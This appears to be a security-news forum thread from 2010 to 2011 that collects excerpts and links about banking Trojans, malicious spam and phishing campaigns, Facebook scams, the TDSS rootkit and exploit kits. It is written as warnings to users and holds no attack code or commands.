Oct. 12, 2010 - "... while Zeus, indeed, is the undisputed king of financial fraud malware today, a handful of other banking Trojans in the wings are slowly and quietly gaining ground. The Bugat Trojan is one such malware family that has been overshadowed by Zeus, and it turns out it was also distributed in the recent LinkedIn phishing attack - not just Zeus, as some experts had believed. Amit Klein, CTO at Trusteer, says his firm spotted Bugat spreading in the attacks. "There were a lot of malicious payloads being distributed, but the interesting one that we kept seeing was Bugat," Klein says. The LinkedIn phishing attack last month, which was considered the largest-ever such attack, sent LinkedIn members email messages reminding them of messages in their accounts, and included a malicious URL that directed them to a phony site that installed the Bugat executable, according to Trusteer researchers. Bugat was initially discovered in February by SecureWorks* and has some features similar to those found in banking Trojans Zeus and Clampi, but with a few twists. It uses an SSL-encrypted command-and-control (C&C) infrastructure using HTTP-S, and also steals FTP and POP credentials in those sessions. It was originally distributed via the Zbot botnet that spreads the pervasive Zeus. Then there's Carberp**, a banking Trojan that was first spotted spreading in May and now appears to be morphing into an even more sophisticated piece of malware, according to researchers at TrustDefender Labs. It disables other Trojans on the machine it infects and can run without administrative privileges. It also goes after Windows Vista and Windows 7, as well as XP..."
* http://www.secureworks.com/research/blog/index.php/2010/02/08/new-banking-trojan-targeting-ach-and-wire-payment-sites-is-discovered/

** http://www.trustdefender.com/blog/2010/10/06/carberp-%E2%80%93-a-new-trojan-in-the-making/
Oct. 6, 2010

- http://blog.trendmicro.com/carberp-trojan-steals-information/
Oct. 14, 2010


2010-10-13, 13:59

Hijacked MS network pushes Canadian pharmacy
- http://www.theregister.co.uk/2010/10/12/microsoft_ips_hijacked/
12 October 2010 - "For the past three weeks, internet addresses belonging to Microsoft have been used to route traffic to more than 1,000 fraudulent websites maintained by a notorious group of Russian criminals, publicly accessible internet data indicates. The 1,025 unique websites — which include seizemed .com, yourrulers .com, and crashcoursecomputing .com — push Viagra, Human Growth Hormone, and other pharmaceuticals through the Canadian Health&Care Mall. They use one of two IP addresses belonging to Microsoft to host their official domain name system servers, search results from Microsoft’s own servers show. The authoritative name servers have been hosted on the Microsoft addresses since at least September 22... The Register independently verified his findings with other security experts who specialize in DNS and the take-down of criminal websites and botnets. By examining results used with an internet lookup tool known as Dig, short for the Domain Information Groper, they were able to determine that and — which are both registered to Microsoft — are housing dozens of DNS servers that help convert the pharmacy domain names into the numerical IP addresses that host the sites. The most likely explanation, they say, is that a machine on Microsoft's campus has been programmed to do so, probably after it became infected with malware... A Microsoft spokeswoman said she was investigating the findings and expected to provide a statement once the investigation was completed..."

- http://krebsonsecurity.com/2010/10/pill-gang-used-microsofts-network-to-attack-krebsonsecurity-com/
October 13, 2010


2010-10-14, 12:45

MS network used by Pill gang in attack...
- http://krebsonsecurity.com/2010/10/pill-gang-used-microsofts-network-to-attack-krebsonsecurity-com/
October 13, 2010 / Update, 7:34 p.m. ET - "Christopher Budd, Microsoft’s response manager for trustworthy computing, sent this statement via email: “Microsoft became aware of reports on Tuesday, October 12, 2010, of a device on the Microsoft network that was possibly compromised and facilitating spam attacks. Upon hearing these reports, we immediately launched an investigation. We have completed our investigation and found that two misconfigured network hardware devices in a testing lab were compromised due to human error. Those devices have been removed and we can confirm that no customer data was compromised and no production systems were affected. We are taking steps to better ensure that testing lab hardware devices that are Internet accessible are configured with proper security controls.”"
- http://www.theregister.co.uk/2010/10/14/microsoft_confirms_ip_hijack/
14 October 2010


2010-10-19, 19:27

More malicious SPAM emails...

Fake UPS shipment error e-mail messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=19743
Last Published: October 19, 2010... the attachment actually contains a malicious .exe file that, if executed, attempts to infect the user's system with malicious code...

Fake Photograph sharing e-mail messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=21608
... significant activity on October 18, 2010... informs the recipient to follow URLs to view the photos. However, the URLs could redirect to a malicious .exe file that, upon execution, attempts to infect the recipient's system with malicious code...

Fake Chat invitation e-mail messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=21588
Last Published: October 18, 2010... text in the e-mail message instructs the recipient to open the attachment to view the photograph. However, the attachment is a malicious .exe file...

Fake UPS ZIP Attachments Spreads Oficla Trojan
- http://blog.urlvoid.com/fake-ups-zip-attachments-spreads-oficla-trojan/
October 20, 2010

Fake Video Link E-Mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=21648
Last Published: October 27, 2010


2010-10-21, 14:30

Kaspersky site hit by hacks - again...
- http://news.techworld.com/security/3244883/kaspersky-website-hit-by-hackers/
20 October 10 - "Scammers who try to trick victims into downloading fake antivirus software can strike almost anywhere. On Sunday they hit the website of Kaspersky Lab, a well-known antivirus vendor. Someone took advantage of a bug in a Web program used by the Kasperskyusa.com website and reprogrammed it to try and trick visitors into downloading a fake product, Kaspersky confirmed Tuesday. Kaspersky didn't identify the flaw, but said it was in a "third-party application" used by the website. "As a result of the attack, users trying to download Kaspersky Lab's consumer products were redirected to a malicious website," the antivirus vendor said. The website caused a pop-up window to appear that simulated a virus scan of the user's PC, and offered to install an antivirus program that was in fact bogus... According to Kaspersky, its website was redirecting users to the rogue antivirus site for about three-and-a-half hours Sunday... This isn't the first time Kaspersky has had to audit its websites after an incident. In February 2009 a hacker was able to break into the company's US support site after discovering a Web programming flaw..."


2010-10-22, 17:42

Employees circumvent security controls via Webmail, file sharing...
- http://www.darkreading.com/shared/printableArticle.jhtml?articleID=227900492
Oct. 21, 2010 - "... According to Palo Alto Networks*, personal Webmail (such as Gmail, Hotmail, and Yahoo Mail), instant messaging, and peer-to-peer and browser-based file-sharing apps were used in 96 percent of the enterprises, and those apps made up nearly one-fourth of all bandwidth. The bad news is that most of these apps are unmonitored and not controlled by the enterprise, which leaves the organization open to attack or data leakage, the report says. Workers' Facebook activity is more voyeuristic, with 69 percent of Facebook traffic on these organizations being used for viewing Facebook pages, while Facebook apps make up about 4 percent of traffic and posts, only about 1 percent of traffic... There were 114,000 log instances of Conficker infections** among Palo Alto customers... Web- or browser-based file-sharing now constitutes 96 percent of file sharing, according to the data, with apps including Skydrive, USendIt, RapidShare, and DocsStock. BitTorrent remains the most popular peer-to-peer file-sharing program in use in companies..."
* http://www.paloaltonetworks.com/news/press_releases/2010-1021-aur-report.html

** http://www.confickerworkinggroup.org/infection_test/cfeyechart.html


2010-10-29, 14:22

SPAM still prolific ...

All Tricks & No Treat for Anti-Spam Engines
- http://community.websense.com/blogs/securitylabs/archive/2010/10/29/all-tricks-amp-no-treat-for-anti_2D00_spam-engines.aspx
29 Oct 2010 - "... always be cautious in opening emails from unknown users."

“Pump & Dump” Spam turns to Indian Stocks
- http://www.symantec.com/connect/blogs/pump-dump-spam-turns-indian-stocks
Oct. 28, 2010

Dating and Malware Spam dominates the Top Spam Subject Lines
- http://www.symantec.com/connect/blogs/dating-and-malware-spam-dominates-top-spam-subject-lines
Oct. 28, 2010

... MORE examples of spam subject lines:
Subject: DIWALI OFFER FROM <removed> UK.
Subject: Celebrate this Diwali with <removed> T-Shirts - Redeem voucher included
Subject: <removed>: Diwali offer
- http://www.symantec.com/connect/blogs/don-t-let-spammers-darken-your-light-festival
Oct. 28, 2010


2010-11-05, 20:02

Don’t click that “pic.exe” file
- http://labs.m86security.com/2010/11/hi-my-love-please-dont-click-that-pic-exe-file/
November 3, 2010 - "Nowadays, spammers usually craft elaborate and enticing scams to lure a lot of people into taking action. However, a spam campaign we observed recently is one of the cruder forms of social engineering. Attached to the spam message is simply an executable file named “pic.exe” that claims to be naked pictures. This spam has been circulating with the subject line, “hi my love”... spammers probably don’t care if a spam campaign is unsophisticated. They can send millions of messages, and a few people will inevitably get sucked in anyway. Secondly, these days getting infected usually means multiple pieces of malware doing different things on your computer. Some malware may be obvious like Fake AV, but most will be hidden."


2010-11-08, 18:28

- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Threat Outbreak Alert: Fake Attached Resume E-mail Messages...
November 08, 2010
Threat Outbreak Alert: Fake Unicaja Bank Security Update E-mail Messages...
November 08, 2010
Threat Outbreak Alert: Fake Security Update For Microsoft Windows E-mail Messages...
November 08, 2010
Threat Outbreak Alert: Fake Self-View Video Link E-mail Messages...
November 08, 2010
Threat Outbreak Alert: Fake Scanned Document E-mail Messages...
November 08, 2010
Threat Outbreak Alert: Fake Chat Invitation E-mail Messages...
November 08, 2010

- http://blogs.cisco.com/security/out-of-control-user-frenetic-it/
November 8, 2010 - "When you access your email each day, do you do so at a distance of 15 paces because you’re just not sure what might jump out of that inbox? You can just about anticipate an email detailing how another user has caused a “blip” that will stretch your capabilities to protect both the user during their online engagements and the assets of the company..."

- http://www.ironport.com/toc/
Virus Outbreak In Progress - (Last Updated: November 10, 2010)
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77


2010-11-11, 17:43

Facebook app links to malware...
- http://www.trustedsource.org/blog/512/Facebook-App-Links-to-Malware
November 11, 2010 - "... a malicious Java applet was being linked through a Facebook application. Users don’t have to install the Facebook app on their profiles to be exposed to this threat. On browsing to a specific Facebook application page displayed in an Eastern European language, the page connects to a malicious site that hosts a signed Java applet that claims to be “Sun_Microsystems_Java_Security_Update_6” and is published by “Sun Java MicroSystems”... The only indication of suspicious activity is the fact that the digital signature cannot be verified by a trusted source. The warning also requests permission from the user to run the applet... In this case, when the user clicks Run, the Java applet downloads an arbitrary executable from a URL passed as a parameter on the website... The downloaded trojan payload is a password stealer which searches for passwords stored on the user’s machine..."

> http://forums.spybot.info/showpost.php?p=388366&postcount=7


2010-11-12, 17:24

(More) Fake e-mail SPAM messages...

- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Hotmail Account Deactivation E-mail Msgs... November 12, 2010
Fake Scanned Document E-mail Msgs... November 12, 2010
Fake DHL Shipment E-mail Msgs... November 12, 2010

- http://www.ironport.com/toc/
Virus Outbreak In Progress - (Last Updated: November 12, 2010)


2010-11-15, 21:24

Malicious SPAM...

- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Royal Bank Security Update E-Mail Messages...
Fake Unicaja Bank Security Update E-mail Messages...
Rapidshare Link E-mail Messages...
Fake Chat Invitation E-mail Messages...

- http://www.ironport.com/toc/
Virus Outbreak In Progress - November 15, 2010

- http://blog.trendmicro.com/russian-spam-on-the-rise/
Nov. 15, 2010


2010-11-16, 11:26

Worms in IM chats...
- http://www.theinquirer.net/inquirer/news/1897876/microsoft-disables-live-messenger-links
Nov 15 2010 - "... Microsoft has shut down links to some websites in the 2009 builds of Windows Live Messenger. According to the Vole's blog*, disabling the feature was designed to prevent the spread of a malicious worm. The worm requires users to click a link within a message, upon which it will load a webpage that downloads the worm to your PC and then it sends the same message to people in your contact list. It only affected those who had not upgraded to the newest version of Messenger that uses Microsoft's Smartscreen, which shows up when you click on any link shared via Messenger. A spokesperson said that the malicious worm was trying to spread itself through many of the world's largest instant messaging and social networks, including Windows Live Messenger 2009. The worm spreads by inserting a link into an IM conversation with a person whose computer is already infected. Normally, when Messenger sees a web address in a conversation it is turned into a hyperlink which, when clicked, automatically opens in a web browser. This feature made it a doddle for the worm to be unknowingly installed on your computer by clicking on the link and being sent to a website containing the malicious software. Some customers might also see a notification in the main Messenger window warning them that some features might not be available, the spokesperson said."
* http://windowsteamblog.com/windows_live/b/windowslive/archive/2010/11/12/security-alert-active-links-in-messenger-2009-temporarily-turned-off-to-prevent-a-malicious-worm.aspx


2010-11-18, 03:51

Asprox spamming more Sasfis
- http://labs.m86security.com/2010/11/asprox-spamming-more-sasfis/
November 17, 2010 - "Ever since the recent take down attempts of the Pushdo and Bredolab botnets, the volume of malicious spam has dropped substantially. But there is still one major player spamming out malicious executables, namely the Asprox spambot. Malicious spam campaigns purporting to be from DHL, Fedex, UPS or USPS have been spammed by the Asprox botnet ever since it resurrected in mid-2010. These messages contain zip file attachments containing executable files which are almost exclusively the Trojan Sasfis, a downloader bot... The extracted Sasfis executable file usually has a Microsoft Excel icon. The payload varies depending on the task sent by the control server. Recently, we have seen it download Fake AV installers... Currently, the Sasfis trojan is requesting commands from the domain name showtimeru .ru... In our previous blogs* about Asprox, we highlighted three of the domains that the bot connects to. In the newer samples however, Asprox is connecting to the inglo-kotor .ru domain name. Interestingly, the previous and the newer domains point to the same server in Sweden**... In summary, it is the same old well-worn theme that Asprox has been using for six months. Don’t get too excited if you see this in your inbox, especially if you are an avid online buyer expecting a package."
* http://labs.m86security.com/2010/06/another-round-of-asprox-sql-injection-attacks/

(Screenshots available at both m86 URLs above.)

** http://labs.m86security.com/wp-content/uploads/2010/11/IP-sweden.png


2010-11-20, 13:48

New Asprox Facebook SPAM campaign
- http://labs.m86security.com/2010/11/new-asprox-facebook-spam-campaign/
November 19, 2010 - "... new Asprox template purporting to be an email from Facebook support. This spam campaign claims the user’s Facebook password has been changed or access to their account has been blocked... As before, the attachment is the Sasfis trojan, the same breed of downloader Trojan we discussed yesterday. This sample however connects to a different domain; pupmypzed .ru... Just this week, there was outrage when many Facebook users, many of whom were female, found their accounts disabled following an automated Facebook system ‘cleanup’ of dubious accounts. Spammers may have taken advantage of this publicity..."
(Screenshots available at the m86 URL above.)


2010-11-22, 14:10

- http://labs.m86security.com/2010/12/mcafee-secure-short-url-service-or-is-it/
December 6, 2010 - "... Users should carefully check the links coming from emails, Facebook or any other social network, when the sender is unknown and the link is shortened, because there is no guarantee the URL is safe ..."

Facebook SCAMS multiply...
- http://nakedsecurity.sophos.com/2010/11/21/beware-the-justin-bieber-erection-facebook-scam/
November 21, 2010 - "... Surveys like this generate revenue for the scammers who are behind the application - they earn commission for every survey that is completed. In the background meanwhile, the rogue application has abused your social networking account spreading the spam virally via your wall to your Facebook friends and family... scams like this will continue for as long as users continue to fall for silly tricks like this, and the scammers continue to find it financially rewarding. If you've been hit by a scam like this, remove references to it from your newsfeed, and revoke the right of rogue applications to access your profile via Account/ Privacy Settings/ Applications and Websites. Don't forget - if you know young people who use Facebook, you should warn them about scams like this and teach them not to trust every link that is placed in front of them..."

- http://nakedsecurity.sophos.com/2010/11/03/justin-bieber-hit-girl-facebook-survey-scam/

- http://nakedsecurity.sophos.com/2010/11/20/jeremy-kyle-is-forced-to-step-back-after-man-starts-headbutting-facebook-scam/

- http://nakedsecurity.sophos.com/2010/07/23/viewed-facebook-profile-care/

- http://nakedsecurity.sophos.com/2010/10/07/father-catches-daughter-on-her-webcam-its-a-facebook-survey-scam/

20 percent of Facebook users exposed to malware
- http://news.cnet.com/8301-13577_3-20023626-36.html
November 22, 2010

Security apps for Facebook ...
- http://www.facebook.com/bitdefender.safego?v=info
BitDefender safego
- http://www.facebook.com/apps/application.php?id=177000755670
Defensio - Websense

- http://www.theregister.co.uk/2010/11/24/facebook_malware_survey/
24 November 2010 - "... one in five items on the news feeds of Facebook users lead to malicious content. More than three in five (60 per cent) of these attacks come from notifications generated by malicious third-party applications on Facebook's developer platform - BitDefender's stats comes from users of safego... similar to figures from users of BitDefender's tool... Websense's Defensio tool... about 10 per cent are spam or malicious..."

Facebook accounts disabled
- http://sophosnews.files.wordpress.com/2010/11/facebook-trend.jpg?w=640

- http://nakedsecurity.sophos.com/2010/11/16/bug-causes-havoc-facebook-as-accounts-disabled/
November 16, 2010


2010-11-25, 03:29

Holiday shopping advisories ...

- http://news.cnet.com/8301-27080_3-20023728-245.html
November 24, 2010

- http://blog.trendmicro.com/with-holiday-wishes-come-poisoned-searches/
Nov. 23, 2010

- http://www.ic3.gov/media/2010/101118.aspx
November 18, 2010

- http://www.f-secure.com/en_US/security/security-center/security-stories/holiday-online-shopping.html

- http://www.bbb.org/us/article/top-ten-cyber-monday-tips-for-staying-safe-when-shopping-online-23416

- http://newsroom.mcafee.com/article_display.cfm?article_id=3707


2010-11-30, 19:54

Ecard SPAM malware - from "banks" ...
- http://techblog.avira.com/2010/11/30/ecards-from-banks/en/
November 30, 2010 - "Our spamtraps started to get flooded with a new type of spam which is spreading a malicious file. The authors somehow couldn’t decide how to make the scam more credible, so they mixed up whatever they could find. The email pretends to be an electronic card coming from a “Europe Bank” but in the body the German bank “Bankpost” (which doesn’t exist, but should remind the recipient of Postbank obviously) is mentioned... The file referenced is called “card.exe” and contains the Trojan detected by our products as TR/Drop.Agent.ctj.
With Christmas coming soon, we expect more and more of such scams pretending to be ecards from known persons, financial institutions and companies. Never click on the links contained, never execute the files attached in the email..."


2010-12-06, 19:19

Fake viral SPAM messages ...
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake System Performance Software E-mail Messages...
December 06, 2010
Fake Secure Banking Application E-mail Messages...
December 06, 2010
Rapidshare Link E-mail Messages...
Updated! December 06, 2010

- http://www.ironport.com/toc/
Virus Outbreak In Progress



2010-12-10, 19:33

SPAM msgs lead to "Virus Outbreak In Progress" ...

- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake United Parcel Service Shipment Arrival E-mail Messages...
New! December 10, 2010
Fake DHL Shipment E-mail Messages...
Updated! December 10, 2010
Rapidshare Link E-mail Messages...
Updated! December 10, 2010
Fake Chat Invitation E-mail Messages...
Updated! December 10, 2010

- http://www.ironport.com/toc/
Virus Outbreak In Progress ...


2010-12-20, 14:38

TDSS malware/rootkit autostart...
- http://blog.trendmicro.com/dissecting-the-autostart-technique-of-tdss/
Dec. 20, 2010 - "... Samples of a new TDSS variant, WORM_TDSS.TX, use the infamous LNK vulnerability (first brought to public attention by Stuxnet) to propagate... There are two techniques that TDSS uses for its autostart routines:
• Randomly choosing a system driver file (normally seen in %Windows%\System32\Drivers), modifying its resource section, and using this to directly read hard disk sectors and assemble its DLL file for its main malware behavior.
• Modifying the Master Boot Record (MBR) and using this to directly read hard disk sectors and assemble its DLL file for its main malware behavior...
TDSS targets BootExecute applications that are started by the Session Manager (smss.exe) before invoking the initial command (Winlogon in Windows XP) and before various subsystems are started. User-mode applications are not yet running at this point. Because they run so early, there is a significant restriction on BootExecute applications: they must be native applications. In this context, “native” means that only the Windows NT Native API, resident in ntdll.dll, is available. At this stage, the Win32 subsystem, composed of the kernel-mode win32k.sys component and the user-mode client/server runtime CSRSS, has not yet been started by SMSS. Not even the Kernel32 library is usable by BootExecute applications..."
(More detail and flowchart available at the URL above.)

TDSS infection count (alias: TDL3, Alureon)
- http://blog.trendmicro.com/wp-content/uploads/2010/11/2010-11-10-blog-tdss-infection-count.jpg

- http://support.kaspersky.com/viruses/solutions?print=true&qid=208280684
2010 Dec 17

- http://blog.urlvoid.com/new-tdss-variants-install-plenty-of-software/
December 19, 2010


2010-12-27, 13:48

ZeuS variant returns ...
- http://blog.trendmicro.com/old-zeus-variant-returns-for-christmas/
Dec 23, 2010 - "... A spammed message, purportedly from the Executive Office of the President of the United States, spreads holiday cheer with a message and links to what is supposedly a greeting card. Clicking the link, however, leads users to a website injected with malicious iFrame tags, which Trend Micro detects as HTML_IFRAME.SMAX. Viewing the malicious HTML page leads to the download of a .ZIP file, which contains the malware detected as TSPY_ZBOT.XMAS... This particular variant exhibits routines that ZeuS version 1.x is known for. Apart from the typical information theft routines, it modifies HOSTS files to prevent affected victims from accessing AV-related websites. The technique of using important events to lure potential victims to open the spam mail is not new either. While some targeted victims may have an idea that these types of messages could be malicious, some people simply rely on their antivirus programs. The cybercriminals behind this attack took advantage of this fact by ensuring that the file is heavily packed and is not yet detected by most AV programs, leaving unknowing users vulnerable..."

- http://isc.sans.edu/diary.html?storyid=10138
Last Updated: 2010-12-23 23:00:10 UTC - "... reports of some targeted emails from 'The White House'..."


2010-12-30, 19:42

Beware of strange web sites bearing gifts ...
- http://isc.sans.edu/diary.html?storyid=10168
Last Updated: 2010-12-29 22:02:52 UTC - "... a recent wave of Java exploits to several addresses in the same netblock**. The latest exploits in this case start with a file called "new.htm", which contains obfuscated code... The good news is that "host.exe" already has pretty decent anti-virus coverage on VirusTotal*... all the user has to do is click "Run" to get owned. The one small improvement is that the latest JREs show "Publisher: (NOT VERIFIED) Java Sun" in the pop-up, but I guess that users who read past the two exclamation marks will be bound to click "Run" anyway ..."
- http://isc.sans.edu/diaryimages/d-img3%281%29.jpg

* http://www.virustotal.com/file-scan/report.html?id=f3e5bed2a9d835010ed392dce20b6ea570b62e66e69291dd8104c7e65b3ef9d8-1293650723
File name: host.exe
Submission date: 2010-12-29 19:25:23 (UTC)
Result: 31/43 (72.1%)

** http://isc.sans.edu/diary.html?storyid=10165
Last Updated: 2010-12-29 00:04:58 UTC


2010-12-30, 20:05

Android trojan found in wild - NEW
- http://blog.mylookout.com/2010/12/geinimi_trojan/
December 29, 2010 - "A new Trojan affecting Android devices has recently emerged in China. Dubbed “Geinimi” based on its first known incarnation, this Trojan can compromise a significant amount of personal data on a user’s phone and send it to remote servers... Geinimi is also the first Android malware in the wild that displays botnet-like capabilities. Once the malware is installed on a user’s phone, it has the potential to receive commands from a remote server that allow the owner of that server to control the phone..."

- http://www.h-online.com/security/news/item/Android-trojan-collects-personal-data-1162008.html
30 December 2010 - "... If you get your apps from obscure sources, you will want to be careful not to give them unlimited rights, which the apps request upon installation; instead contact the vendor to see what rights are actually needed."

- http://isc.sans.edu/diary.html?storyid=10186
Last Updated: 2010-12-31 09:47:01 UTC


2011-01-01, 18:13

New Year SPAM - Storm/Waledac...
- http://community.websense.com/blogs/securitylabs/archive/2010/12/31/yesterday-s-new-year-email-theme-post-is-storm-waledac.aspx
31 Dec 2010 09:50 PM - "... emails mentioned were an early campaign done by what's now believed to be Storm v3 or Waledac v2. As our friends over at ShadowServer mention**... The URL in the email leads to lots of different sites, all compromised, where the user is immediately redirected using a <meta refresh> tag... A few other noteworthy things about this attack:
• The domains it uses to serve the malware are fast-fluxing which means that when you request the URL it redirects you to a different IP address every time
• The file itself is either server-side generated or just updated very frequently
• AV coverage is pretty bad* ..."
* http://www.virustotal.com/file-scan/report.html?id=54a643acad42df4eb5380765b25abce2a7157b62188458757cc984757343b57e-1293849911
File name: flash-006.exe
Submission date: 2011-01-01 02:45:11 (UTC)
Result: 7/42 (16.7%)

** http://forums.spybot.info/showpost.php?p=392223&postcount=52


2011-01-04, 17:45

Xvid video fakes... TRON previews...
- http://sunbeltblog.blogspot.com/2011/01/tron-and-gone-fakeouts-galore.html
January 04, 2011 - "... hunting for some TRON action on the internet may end in frustration, surveys and installs aplenty. For example, hd-movies(dot)biz gives us a fairly standard “Fake advert on Youtube/hit you with a survey” scam... You might not want to bother... Clicking the player underneath the banner splash takes you to browserdl(dot)com/xvid_dl/ which wants you to install a program... XvidSetup.exe... there isn’t any TRON action going down once the end-user has installed ClickPotato, ShopperReports, QuestBrowser and blinkx Beat..."


2011-01-07, 14:50

NeoSploit exploit kit - dynamic obfuscation...
- http://labs.m86security.com/2011/01/shedding-light-on-the-neosploit-exploit-kit/
January 4, 2011 - "... dynamic obfuscation still makes it much harder for security vendors to block this type of attack... Not only has the Neosploit team upgraded their obfuscation techniques, they’ve also put a lot of thought into the architecture of the toolkit's backend. Unlike other exploit kits, where the authors sell the toolkit itself (in some cases the source code is encrypted and could work only under a certain domain), the users of the Neosploit Exploit Kit don’t need to have the source code or even the compiled version of the tool. The Neosploit backend is activated only by the team itself and the users just receive access to use it, effectively establishing a business model of Malware-as-a-Service... it is being maintained and adjusted to keep up with security trends to allow it to stay ahead of the curve."
(More detail available at the m86 URL above.)

How hacks profit...
- http://blog.trendmicro.com/wp-content/uploads/2011/01/2011-01-06-blog-vulnerability-img1a.jpg


2011-01-07, 18:40

Facebook scam - again...
- http://nakedsecurity.sophos.com/2011/01/06/my-1st-sttus-scam-hits-facebook-users-hard-spreads-virally/
January 6, 2011 - "Thousands upon thousands of Facebook users have been hit by a new survey scam spreading virally across the social network. Messages claiming to be users' first ever Facebook status updates are being posted on users' walls by a rogue application... Here's what some typical messages look like:
My 1st St@tus was: "[random message]". This was posted on [random date]
Find your 1st St@tus @ [LINK]
Other versions read:
My 1st status was: '[random message]' Posted on [random date]
Find out what your 1st status is at [LINK]
If you click on the link you are taken to a rogue Facebook application, which asks you to give it permission to access your profile, which includes giving it the ability to post from your account in your name... its only intention is to drive as many people as possible into sharing the link (which can vary - we have seen several examples) further and further across Facebook, earning the scammers money..."


2011-01-10, 13:20

Facebook weekend worm...
- http://www.theregister.co.uk/2011/01/10/facebook_worm_photo_chat_scam/
10 January 2011 - "A new worm that spreads using a photo album chat message lure began proliferating across Facebook over the weekend. The photo lure is used to hoodwink potential users into downloading a malicious file, which appears in the guise of a photo viewing application. Victims are prompted to click a "View Photo" button... users who fell for the scam became infected by malware, dubbed Palevo-BB* by net security firm Sophos. The malware attempts to generate a message to the victim's Facebook contacts, continuing the infection cycle. Facebook responded by purging the malicious application.
Similar social engineering trickery is much more commonly used to hoodwink users into completing worthless surveys, possibly handing over personal details in the process or signing up to expensive text message services. Survey scams have become almost a daily pest on Facebook. For example, one survey scam** lure doing the rounds over the weekend falsely offered a news update of the death of famous rapper Tupac Shakur. The use of social engineering trickery to spread malware instead of simply tricking users into filling out worthless surveys suggests that cybercrooks might be upping the ante. The latest Palevo-BB worm is not the first malware strain to use Facebook as an infection avenue. The most prolific social engineering network worm to date has been the infamous Koobface worm, a strain of malware used to deliver potential victims to scareware scam portals or carry out click fraud..."
* http://nakedsecurity.sophos.com/2011/01/09/facebook-photo-album-chat-messages-spreading-koobface-worm/

** http://nakedsecurity.sophos.com/2011/01/08/125000-people-fooled-by-tupac-shakur-suge-knight-facebook-scam

- http://labs.m86security.com/2011/01/facebook-1st-status-scam-spreads-rapidly/
January 11, 2011


2011-01-12, 09:46

SPAM cannons on holiday
- http://isc.sans.edu/diary.html?storyid=10255
Last Updated: 2011-01-12 04:06:34 UTC - "... There was a clear reprieve in spam delivered over the 2010 year end holiday season for various reasons. SpamCop.net* shows a decisive break in spam delivery that resumed action late Sunday... we wanted to share with you some corresponding DShield data... shows unwanted connections, which should be a good sample representation of infected systems. There is a slight dip which can be attributed to the holiday season or a "weekend drop" type of decline. It does not indicate spam cannons have been replaced by more lucrative malicious channels, nor have the botnets taken a break either..."

* http://www.spamcop.net/spamgraph.shtml?spamweek

- http://www.spamcop.net/spamgraph.shtml?spammonth

- http://krebsonsecurity.com/2011/01/taking-stock-of-rustock/
January 5, 2011

- http://www.symantec.com/connect/blogs/rustock-hiatus-ends-huge-surge-pharma-spam
10 Jan 2011


2011-01-12, 18:37

Q4-2010 - Top 50 Bad Hosts and Networks
- http://hostexploit.com/blog/14-reports/3528-repeat-offenders-host-cybercrime-activity.html
12 January 2011 - "... The emphasis this quarter is on the repeat offending of some hosting providers... VolgaHost AS29106 is no stranger to the Top 50 reports, having been in the top 10 for the entire 6 months prior to this quarter. And yet the effective badness levels have continued to rise to now take the #1 rank. Particularly prevalent on VolgaHost are Zeus servers and infected web sites. On the theme of repeat offenders, it has been a disappointing quarter for eNom AS21740, the domain Registrar arm of Demand Media. Ever willing to give credit where due, HE praised, in the last quarter report, what seemed to be a genuine attempt on eNom’s part to ‘clean-up’. Sadly, however, this effort appears to have been short lived. eNom is back up to ranking #3 from #7 in Q3, having previously been #1. In the Badware sector eNom is once again top of the pile as #1 Bad Host. HE’s view is that the majority of hosts do a good job at keeping their servers clean. So why then are there hosts such as VolgaHost, eNom and Ecatel AS29073 (displaced from #1 down to #2), all of whom display enduring levels of cybercriminal activities on their servers?... Perhaps the attitude of hosting providers is best summed up by Andre' M. Di Mino (Co-Founder & Director of The Shadowserver Foundation) in his foreword to the report:
"The majority of network and hosting providers are very concerned about their reputation and will respond in rapid fashion when notified of malicious activity. Others are content to let such activities flourish. In any case, it is important to highlight those providers where malicious activity is rampant, and raise general public awareness." - Andre' M. Di Mino
HE’s Q4 2010 Report exposes the persistent nature of some of the more dubious activities hosted by a few providers such as:
• INTERIAPL (PL) AS16138 #1 for Current Events (exploit kits etc) since June 2010.
• DATA ELECTRONICS (IE) AS13100 #1 for Exploit Servers in the last 2 reports.
An example of the lack of due diligence allowing bad habits to return can be seen with Brazilian Cyberweb Networks AS28299. This hosting provider had dropped down to #228 in Q3 2010, from #9 in Q2 as a result of ‘cleaning-up’. Recent increased levels of botnets and phishing, however, have bounced this provider back up to #21. The HE Q4 2010 Report recognizes the genuinely hard effort made by hosts and providers intent on ‘cleaning up’. The ‘Most Improved Hosts’ section displays those deserving of praise and approval for their achievements. For example: CTC-CORE-AS (RU) AS44237 #29 in Q3 now #27,204. An improvement of 99% to almost negligible levels of badness. The vast majority of hosts do provide a safe and relatively clean Internet experience for their customers. Approximately only 6% of the 36,371 public ASes (Autonomous Systems) display levels of badness that give cause for concern through ineffective abuse procedures and a tolerance of cybercriminal friendly activities. The HE quarterly reports continue to display the results of monitoring ‘bad’ hosts in anticipation of a cleaner and safer Internet experience for all users..."


2011-01-14, 23:48

Death by PowerPoint...
- http://nakedsecurity.sophos.com/2011/01/12/death-by-powerpoint-kamasutra-presentation-leads-to-backdoor-infection/
January 12, 2011 - "... The malware comes as a file called Real kamasutra.pps.exe (the old double-extension trick). In other words, you may think you are directly opening a PowerPoint slideshow, but in fact you're running an executable program. The PowerPoint slide deck... is then dropped onto your Windows PC as a decoy while malware silently installs onto your computer as AdobeUpdater.exe, alongside some other components (called jqa.exe and acrobat.exe). Because of this, when you click on the file you do get to see a real PowerPoint presentation, but in the background a backdoor Trojan (no sniggering at the back please..) called Troj/Bckdr-RFM is installed which allows hackers to gain remote access to your computer. Once they have broken into your computer, they can use it to relay spam around the world, steal your identity, spy on your activities, install revenue-generating adware or launch denial of service attacks. Remember - don't rush to click on unknown files, you could be opening yourself up to all kinds of unwanted attention."

I've won three million Euros from Bill Gates!
- http://nakedsecurity.sophos.com/2011/01/13/ive-won-three-million-euros-from-bill-gates/
